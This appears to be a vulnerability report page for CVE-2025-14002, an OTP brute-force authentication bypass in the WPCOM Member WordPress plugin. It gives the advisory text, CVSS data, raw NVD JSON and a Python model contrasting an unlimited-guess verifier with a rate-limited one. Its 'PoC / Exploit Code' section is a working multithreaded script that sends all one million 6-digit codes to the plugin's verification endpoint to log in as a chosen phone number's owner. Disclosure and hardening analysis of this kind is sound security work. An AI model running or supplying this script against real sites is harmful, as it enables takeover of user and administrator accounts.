Security Vulnerability Report
CVE-2025-14002 CVSS 8.1 HIGH

CVE-2025-14002

Published: 2025-12-16 10:15:43
Last Modified: 2026-04-15 00:35:42

Description

The WPCOM Member plugin for WordPress is vulnerable to authentication bypass via brute force in all versions up to, and including, 1.7.16. This is due to weak OTP (One-Time Password) generation using only 6 numeric digits combined with a 10-minute validity window and no rate limiting on verification attempts. This makes it possible for unauthenticated attackers to brute-force the verification code and authenticate as any user, including administrators, if they know the target's phone number, and the target does not notice or ignores the SMS notification with the OTP.
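The description above names the three ingredients of the bug: a 6-digit numeric code, a 10-minute validity window, and no limit on verification attempts. The Python model below is an added example for this page, not code from the WPCOM Member plugin (which is PHP) or from the advisory. It implements an OTP store with exactly those properties next to a hardened variant that caps guesses per issued code and then locks the phone number, plus a clock-driven brute-force simulation and the expected-success calculation for a given request rate. The values of MAX_ATTEMPTS and LOCKOUT_SECONDS, the phone numbers, and the in-memory store are assumptions made for illustration.

```python
"""Model of the OTP verification weakness described in CVE-2025-14002.

Added example for this page, not the plugin's PHP. Two verifiers share the
advisory's OTP format (6 numeric digits, 10-minute validity); one accepts an
unlimited number of guesses, the other caps attempts per issued code.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

OTP_DIGITS = 6
OTP_SPACE = 10 ** OTP_DIGITS   # 000000-999999
OTP_TTL_SECONDS = 600          # 10-minute validity window (from the advisory)
MAX_ATTEMPTS = 5               # assumed hardening value: guesses allowed per issued code
LOCKOUT_SECONDS = 900          # assumed hardening value: per-phone lockout after exhausting guesses


@dataclass
class IssuedOtp:
    code: str
    issued_at: float
    attempts: int = 0


@dataclass
class OtpStore:
    """In-memory stand-in (constructed for this example) for the plugin's session storage."""
    limit_attempts: bool                              # False = behaviour the advisory describes
    codes: dict = field(default_factory=dict)         # phone -> IssuedOtp
    locked_until: dict = field(default_factory=dict)  # phone -> unix time the lockout ends

    def issue(self, phone: str, now: float, code: Optional[str] = None) -> str:
        # CSPRNG-generated, zero-padded 6-digit code; `code` lets tests pin a value.
        # Even with a good RNG the keyspace is only 10**6, which is the advisory's point.
        if code is None:
            code = f"{secrets.randbelow(OTP_SPACE):0{OTP_DIGITS}d}"
        self.codes[phone] = IssuedOtp(code=code, issued_at=now)
        return code

    def verify(self, phone: str, candidate: str, now: float) -> bool:
        if self.limit_attempts and self.locked_until.get(phone, 0.0) > now:
            return False
        issued = self.codes.get(phone)
        if issued is None:
            return False
        if now - issued.issued_at > OTP_TTL_SECONDS:
            del self.codes[phone]                     # expired
            return False
        issued.attempts += 1
        if hmac.compare_digest(issued.code, candidate):  # constant-time compare
            del self.codes[phone]                     # single use
            return True
        if self.limit_attempts and issued.attempts >= MAX_ATTEMPTS:
            del self.codes[phone]                     # burn the code and lock the number
            self.locked_until[phone] = now + LOCKOUT_SECONDS
        return False


def brute_force(store: OtpStore, phone: str, rate_per_second: float, now: float):
    """Simulate an attacker guessing 000000 upward at `rate_per_second` for the
    whole validity window. Returns (success, attempts_made)."""
    budget = min(int(rate_per_second * OTP_TTL_SECONDS), OTP_SPACE)
    attempts = 0
    for i in range(budget):
        t = now + attempts / rate_per_second
        attempts += 1
        if store.verify(phone, f"{i:0{OTP_DIGITS}d}", t):
            return True, attempts
        if phone not in store.codes:                  # code burned or expired: stop
            return False, attempts
    return False, attempts


def expected_success_probability(rate_per_second: float, limit_attempts: bool = False) -> float:
    """Chance that one issued code is guessed: guesses actually accepted / keyspace."""
    guesses = rate_per_second * OTP_TTL_SECONDS
    if limit_attempts:
        guesses = min(guesses, MAX_ATTEMPTS)
    return min(1.0, guesses / OTP_SPACE)


if __name__ == "__main__":
    phone = "+10000000000"                            # constructed sample input
    for limit in (False, True):
        store = OtpStore(limit_attempts=limit)
        store.issue(phone, now=0.0, code="000042")    # pinned so the run is reproducible
        print(f"limit_attempts={limit}: brute_force -> {brute_force(store, phone, 50, 0.0)}, "
              f"p(success) at 50 req/s = {expected_success_probability(50, limit):.2e}")
```

At 50 requests per second for the full 600-second window an attacker covers 30,000 of the 1,000,000 codes, a 3% chance per issued code, and because nothing is rate limited the attack can be repeated against each newly issued code and scaled up with more workers. With the attempt cap, each issued code survives at most MAX_ATTEMPTS guesses, so the per-code success probability is 5e-6 regardless of request rate, and the lockout stops the attacker from simply triggering a fresh code and starting over.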

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No NVD configuration (CPE) data available.

WPCOM Member plugin for WordPress <= 1.7.16 (all versions up to and including 1.7.16 are affected, per the description)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-14002 PoC - WPCOM Member OTP Brute Force Attack

Note: This PoC is for educational and authorized testing purposes only.
"""
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

# Placeholders: set these to the authorized target. The REST path is the one
# used by the PoC as published; confirm the actual verification endpoint
# against the plugin source referenced below before relying on it.
TARGET_URL = "https://vulnerable-site.com/wp-json/wpcom-member/v1/verify-otp"
TARGET_PHONE = "+1234567890"  # Target phone number
MAX_WORKERS = 50
OTP_SPACE = 10 ** 6           # 6 numeric digits: 000000-999999


def try_otp(otp_code):
    """Attempt to verify a single OTP code; return (code, response) on success, else None."""
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    }
    data = {"phone": TARGET_PHONE, "otp": otp_code}
    try:
        response = requests.post(TARGET_URL, json=data, headers=headers, timeout=10)
        if response.status_code == 200:
            result = response.json()
            if result.get("success") or "token" in result:
                return otp_code, result
    except Exception:
        pass
    return None


def brute_force_otp():
    """Brute force OTP codes (6 digits: 000000-999999)."""
    print(f"[*] Starting OTP brute force attack on {TARGET_PHONE}")
    print(f"[*] Target URL: {TARGET_URL}")
    print(f"[*] Testing {OTP_SPACE:,} OTP combinations with {MAX_WORKERS} workers...")
    found = None
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        futures = {executor.submit(try_otp, f"{i:06d}"): i for i in range(OTP_SPACE)}
        for future in as_completed(futures):
            result = future.result()
            if result:
                otp, response = result
                print(f"\n[!] SUCCESS! Valid OTP found: {otp}")
                print(f"[!] Response: {response}")
                found = otp
                # Cancel the queued attempts so the executor does not keep
                # hammering the endpoint after success (cancel_futures needs Python 3.9+).
                executor.shutdown(wait=False, cancel_futures=True)
                break
    if not found:
        print("\n[-] No valid OTP found (may require longer attack window)")


if __name__ == "__main__":
    brute_force_otp()
```

References

- https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/class-sesstion.php#L29
- https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/member-functions.php#L833
- https://plugins.trac.wordpress.org/changeset/3411048/wpcom-member
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4f02ee56-40bd-4132-92e1-e2897ff2a4c4?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14002",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T10:15:42.583",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WPCOM Member plugin for WordPress is vulnerable to authentication bypass via brute force in all versions up to, and including, 1.7.16. This is due to weak OTP (One-Time Password) generation using only 6 numeric digits combined with a 10-minute validity window and no rate limiting on verification attempts. This makes it possible for unauthenticated attackers to brute-force the verification code and authenticate as any user, including administrators, if they know the target's phone number, and the target does not notice or ignores the SMS notification with the OTP."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-287"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/class-sesstion.php#L29",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/member-functions.php#L833",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3411048/wpcom-member",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4f02ee56-40bd-4132-92e1-e2897ff2a4c4?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```